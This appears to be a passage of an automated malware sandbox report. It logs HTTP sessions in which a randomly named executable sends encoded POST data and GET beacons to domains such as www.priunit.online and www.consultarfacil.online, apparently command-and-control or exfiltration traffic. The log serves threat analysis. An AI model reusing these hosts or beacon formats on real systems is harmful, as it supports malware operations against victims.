                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.754974162.0.238.238802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:46.054124117 CEST755OUTPOST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 62 51 7a 5a 66 43 6c 4f 31 57 64 39 6b 4d 48 6a 4a 79 50 6a 4a 34 61 42 2b 6a 34 69 4b 61 39 6a 42 71 78 75 4f 32 56 33 63 61 49 37 4a 56 32 53 79 78 43 53 39 68 51 56 55 31 58 79 64 6a 4b 59 77 67 64 59 64 46 56 48 64 74 4a 63 7a 67 55 2f 56 5a 33 6e 79 52 4b 45 5a 79 2f 2b 65 61 52 68 31 2b 37 2b 35 2f 4e 6c 50 4e 58 46 39 71 6e 2f 39 55 4c 4d 4f 76 63 79 67 33 39 42 45 7a 34 47 32 51 49 36 46 5a 34 4d 56 65 44 47 42 71 5a 5a 46 6e 35 50 55 62 69 57 2f 4e 6c 6d 68 4f 54 72 4d 66 6a 63 71 6a 44 30 48 4d 56 46 45 48 71 77 47 46 44 53 74 58 4c 68 37 67 4f 39 35 30 59 33 55 31 33 66 2b 64 75 5a 49 74 2b 4c 47 55 2f 57 61 7a 30 65 56 71 54 4f 6d 61 34 3d
                                        Data Ascii: 3h-p=m/Ee8y2iD1ewbQzZfClO1Wd9kMHjJyPjJ4aB+j4iKa9jBqxuO2V3caI7JV2SyxCS9hQVU1XydjKYwgdYdFVHdtJczgU/VZ3nyRKEZy/+eaRh1+7+5/NlPNXF9qn/9ULMOvcyg39BEz4G2QI6FZ4MVeDGBqZZFn5PUbiW/NlmhOTrMfjcqjD0HMVFEHqwGFDStXLh7gO950Y3U13f+duZIt+LGU/Waz0eVqTOma4=
                                        Sep 27, 2024 06:36:46.661902905 CEST595INHTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:46 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.754975162.0.238.238802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:48.929270029 CEST1768OUTPOST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 62 51 7a 5a 66 43 6c 4f 31 57 64 39 6b 4d 48 6a 4a 79 50 6a 4a 34 61 42 2b 6a 34 69 4b 61 31 6a 43 59 35 75 49 58 56 33 64 61 49 37 4b 56 32 50 79 78 43 50 39 68 59 5a 55 31 62 45 64 68 79 59 7a 43 46 59 62 77 70 48 55 74 4a 63 76 51 55 76 49 4a 33 49 79 52 62 50 5a 79 50 2b 65 61 52 68 31 38 54 2b 2f 71 78 6c 4a 4e 58 47 36 71 6e 37 71 45 4c 6f 4f 76 6c 48 67 32 49 30 46 44 59 47 32 77 59 36 4b 4b 51 4d 61 65 44 45 4d 4b 59 65 46 6e 39 4d 55 62 2b 67 2f 4d 41 37 68 4a 2f 72 4d 62 79 41 32 69 62 66 45 4b 39 41 4f 57 2b 48 41 31 69 68 6a 6d 7a 49 37 42 79 50 39 33 59 79 64 6d 72 73 7a 64 44 6d 52 73 7a 2f 42 67 4c 7a 55 6a 64 4d 48 5a 6e 54 35 2b 62 47 65 75 63 63 79 75 76 4b 4d 62 65 7a 78 70 36 53 53 41 46 73 54 31 65 52 7a 49 62 58 53 6c 5a 37 63 56 68 68 56 65 51 58 2b 79 6c 72 7a 34 6a 79 70 6f 45 70 37 43 51 59 79 70 30 78 31 46 54 54 51 45 5a 68 7a 62 32 66 51 74 38 52 74 6b 79 4f 75 78 76 49 68 33 50 2b 42 78 51 30 54 4d 6e 59 6d 31 74 53 65 [TRUNCATED]
                                        Data Ascii: 3h-p=m/Ee8y2iD1ewbQzZfClO1Wd9kMHjJyPjJ4aB+j4iKa1jCY5uIXV3daI7KV2PyxCP9hYZU1bEdhyYzCFYbwpHUtJcvQUvIJ3IyRbPZyP+eaRh18T+/qxlJNXG6qn7qELoOvlHg2I0FDYG2wY6KKQMaeDEMKYeFn9MUb+g/MA7hJ/rMbyA2ibfEK9AOW+HA1ihjmzI7ByP93YydmrszdDmRsz/BgLzUjdMHZnT5+bGeuccyuvKMbezxp6SSAFsT1eRzIbXSlZ7cVhhVeQX+ylrz4jypoEp7CQYyp0x1FTTQEZhzb2fQt8RtkyOuxvIh3P+BxQ0TMnYm1tSesCIo8WGq9Qs8mWYIB1ArSKscshRogzhglPsf2/TE6RICAackfdj+DTYY4mwNkY2m9WQGmuHvwooFnEc8EXlCMxvLG8FBPFE61hbczi3xrUdjOQlP2CDKEl6QmZA8fXPgZ4Vm8DFDHPiCcNydgqtjAW3P7qUcLl7CE2Wzaze87HuwSZHOqKe3Z+ss2zidWV08f1H6CVjBMtajyaDnMRpbeahW7FQh9zztI32wgWv+xWW/RziIZFArwt2isCvaCqFRD1UiDw67Sm3kkOKqtfhBYOj2SUHcs+t584QnAucFv7LElXn9d/QcLFtvTT4+auI9ExTMb3epsZaWoF4GhbiMnmynX+xd8mHq5cU4JhsDHRSBr5/kOXKiW/VCGElo87/vMWMIXWis7EC/JA0PnoHXlgTD3NXf2ugUOIDUWJ5fovzknzO/Nm5LOLDuLtsQ2H69mFOmVm2USNePMNHdXqZyHdvKKClexPOV7EGpugDA7cWFAafdSdasiRVq5SXdOjfrIw1smt0QBQJxvFfiJHAjLDYTc69Ks/4vrnNz2GBuIkmYWFMGxZCYC3Xl464eaBpOYFrTIKMWV9LuSYBBs6Mj6L1sAlbO+MtiZvEnXBrE/c7UHLNah8Z3OarzoWCPjvqzmSanaT8xC7nTpyisYehAOVV0BE59z1Ez/K [TRUNCATED]
                                        Sep 27, 2024 06:36:49.533869028 CEST595INHTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:49 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.754976162.0.238.238802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:51.473756075 CEST471OUTGET /orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:36:52.047997952 CEST610INHTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:51 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.7549773.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:57.165026903 CEST756OUTPOST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 54 50 4c 42 68 51 77 32 6d 6c 50 73 47 62 34 6c 2b 53 73 51 58 43 64 61 72 35 41 61 36 59 34 72 6e 67 78 34 74 78 78 7a 4b 36 59 57 35 6b 55 66 7a 52 49 38 77 2b 48 59 7a 44 4c 35 2f 65 47 71 71 45 42 48 44 75 48 62 36 67 6a 44 37 6b 61 34 7a 49 2b 43 6e 42 41 35 52 54 6c 32 6b 56 49 42 6a 64 47 68 6d 6e 65 42 4b 50 55 65 4b 46 57 46 6e 79 78 66 75 65 57 7a 2f 66 73 74 36 68 63 46 70 6e 4e 32 78 75 42 61 59 79 4f 2f 77 4c 44 66 72 77 65 35 70 44 4d 4b 36 5a 2b 44 64 5a 47 36 6b 36 30 79 6d 76 69 75 52 65 4b 4d 34 5a 6c 70 31 2b 6e 64 55 38 6f 59 44 2b 33 36 71 54 58 4b 30 65 76 75 2f 67 3d 3d
                                        Data Ascii: 3h-p=aOVMceWJg+ibTPLBhQw2mlPsGb4l+SsQXCdar5Aa6Y4rngx4txxzK6YW5kUfzRI8w+HYzDL5/eGqqEBHDuHb6gjD7ka4zI+CnBA5RTl2kVIBjdGhmneBKPUeKFWFnyxfueWz/fst6hcFpnN2xuBaYyO/wLDfrwe5pDMK6Z+DdZG6k60ymviuReKM4Zlp1+ndU8oYD+36qTXK0evu/g==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.7549783.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:00.077619076 CEST776OUTPOST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 53 73 44 42 6d 79 59 32 7a 56 4f 65 44 62 34 6c 6b 69 73 71 58 43 5a 61 72 34 55 77 36 4c 63 72 6e 46 56 34 73 77 78 7a 47 61 59 57 74 30 55 61 33 52 49 37 77 2b 44 2b 7a 47 6a 35 2f 66 69 71 71 41 46 48 44 39 76 45 37 77 6a 4e 7a 45 61 36 33 49 2b 43 6e 42 41 35 52 58 30 62 6b 56 51 42 67 75 65 68 6e 47 65 43 56 2f 55 64 50 31 57 46 6a 79 78 62 75 65 57 56 2f 65 77 44 36 6b 59 46 70 6e 64 32 78 66 42 5a 4e 69 4f 6c 2b 72 43 4a 73 46 2f 46 72 41 38 47 69 70 7a 64 61 49 75 53 6c 4d 70 51 38 4e 75 43 50 50 79 33 38 62 42 66 69 59 36 6f 57 39 73 41 4f 63 44 62 31 6b 79 67 35 4d 4f 71 70 64 38 56 6d 6f 73 6a 54 69 49 39 30 72 6c 55 57 6e 77 61 4d 73 59 3d
                                        Data Ascii: 3h-p=aOVMceWJg+ibSsDBmyY2zVOeDb4lkisqXCZar4Uw6LcrnFV4swxzGaYWt0Ua3RI7w+D+zGj5/fiqqAFHD9vE7wjNzEa63I+CnBA5RX0bkVQBguehnGeCV/UdP1WFjyxbueWV/ewD6kYFpnd2xfBZNiOl+rCJsF/FrA8GipzdaIuSlMpQ8NuCPPy38bBfiY6oW9sAOcDb1kyg5MOqpd8VmosjTiI90rlUWnwaMsY=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.7549793.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:02.613140106 CEST1789OUTPOST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 53 73 44 42 6d 79 59 32 7a 56 4f 65 44 62 34 6c 6b 69 73 71 58 43 5a 61 72 34 55 77 36 4c 55 72 6d 33 64 34 75 54 5a 7a 48 61 59 57 75 30 55 62 33 52 4a 6e 77 36 76 36 7a 47 6d 43 2f 63 4b 71 73 6a 4e 48 53 38 76 45 78 77 6a 4e 2f 6b 61 35 7a 49 2b 58 6e 42 77 39 52 54 51 62 6b 56 51 42 67 76 75 68 67 58 65 43 4f 2f 55 65 4b 46 57 42 6e 79 78 6a 75 65 50 75 2f 65 31 32 36 51 73 46 6f 47 74 32 7a 4e 5a 5a 4d 43 4f 6a 7a 4c 43 42 73 46 37 67 72 42 52 31 69 70 47 34 61 4a 61 53 6b 4e 73 4b 2f 73 2f 62 63 74 36 51 38 61 64 69 72 5a 71 46 4d 65 63 62 4e 50 62 45 39 32 2b 36 79 73 6d 43 71 6f 68 77 36 4f 4d 49 57 78 31 30 6c 4c 30 52 43 55 51 65 65 5a 6f 4a 34 74 7a 2b 71 53 59 61 43 69 5a 53 54 33 6a 34 72 31 37 4c 62 59 36 5a 68 6b 79 61 67 7a 72 4c 66 79 36 53 44 5a 46 55 4a 7a 44 57 65 72 43 73 54 7a 39 30 77 35 75 57 41 45 49 48 56 4e 78 32 6e 77 63 4c 6d 59 45 76 4b 48 4b 65 4f 74 6a 36 49 63 52 43 6a 67 61 6e 7a 43 75 57 4c 6a 6c 57 75 4a 30 75 54 [TRUNCATED]
                                        Data Ascii: 3h-p=aOVMceWJg+ibSsDBmyY2zVOeDb4lkisqXCZar4Uw6LUrm3d4uTZzHaYWu0Ub3RJnw6v6zGmC/cKqsjNHS8vExwjN/ka5zI+XnBw9RTQbkVQBgvuhgXeCO/UeKFWBnyxjuePu/e126QsFoGt2zNZZMCOjzLCBsF7grBR1ipG4aJaSkNsK/s/bct6Q8adirZqFMecbNPbE92+6ysmCqohw6OMIWx10lL0RCUQeeZoJ4tz+qSYaCiZST3j4r17LbY6ZhkyagzrLfy6SDZFUJzDWerCsTz90w5uWAEIHVNx2nwcLmYEvKHKeOtj6IcRCjganzCuWLjlWuJ0uT3FJIsfEbsyERILxjEMknxSD+Bu1LjGWw3VPu7Ahf46R1jxdKyhyPluykN+Yt9/AiNLQ9T0z0RgHZzYiv8p8wpHGHn+THpoiihx80K8hSexbcdfetU+xfOn5GDzaVPqI98pVEW9UxykOJuYuz/Oo0FE5MkocFg1r4zcwLLH7fJEh9Vqw7ngV4GyBFbsmmK+D8BxIN8d4ZNqBLs0uIFC0DzrECb6PV6vLz7BfBqrC7jWdRaGDVMWRkW/Hp/LrHI2RBpvDWZOTZY28JHGKQhBWqHt1mnnfxVwGEUB5bqaTVocl1k9vVzy8lUSAu7W1pBZQDnDcMaXkZiP5Eit19IoQT46wb1y2WPNbTiDynqXoHLSqeKpjzlDKItw5OjSqoGRigiUbiX9EOsK4EdXwGpzXba0GL6RGiU9fJaeA3v0OQstaYlpzXmxgazegVmFkNc/ZamRFCuhlblCVHxnJqv6tbbLhV6fR2Ten+MvLT045Jp/lBpU/vMlTrIDArqIlvgP+qd+cs/Mf/hSbSr/ErsmfQ+H53U2B8VeeHQ77gWXmuHaJ7cPuKmvLp1dcrgI4H/5EIPrWcyDNBhypvK2a6rqNhOGy58A3M7puk60lzlF5UvLqI40UwjrA784Yv4XUKlG7rajfNvBjUE+PMtAk7OEY3SG/0odbI5vli5M [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.7549803.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:05.286014080 CEST478OUTGET /f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6 HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:37:05.757775068 CEST416INHTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:37:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 26 33 68 2d 70 3d 58 4d 39 73 66 70 36 35 73 4f 75 5a 65 63 33 65 70 78 63 6c 78 58 57 42 42 4a 55 78 69 68 4d 41 57 43 45 55 68 35 51 6e 6f 71 55 79 6e 32 68 43 32 56 74 57 48 65 55 35 75 47 6f 42 31 77 4d 34 6a 5a 37 41 30 44 4c 70 6d 65 79 2f 68 43 52 46 5a 65 47 45 76 6a 37 71 37 58 58 35 78 72 65 37 75 52 59 71 42 48 64 41 31 45 68 43 32 4d 62 48 76 48 6d 30 58 63 31 43 41 68 4c 48 2b 55 6c 38 6f 4f 58 32 34 2f 77 55 79 45 52 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6"}</script></head></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
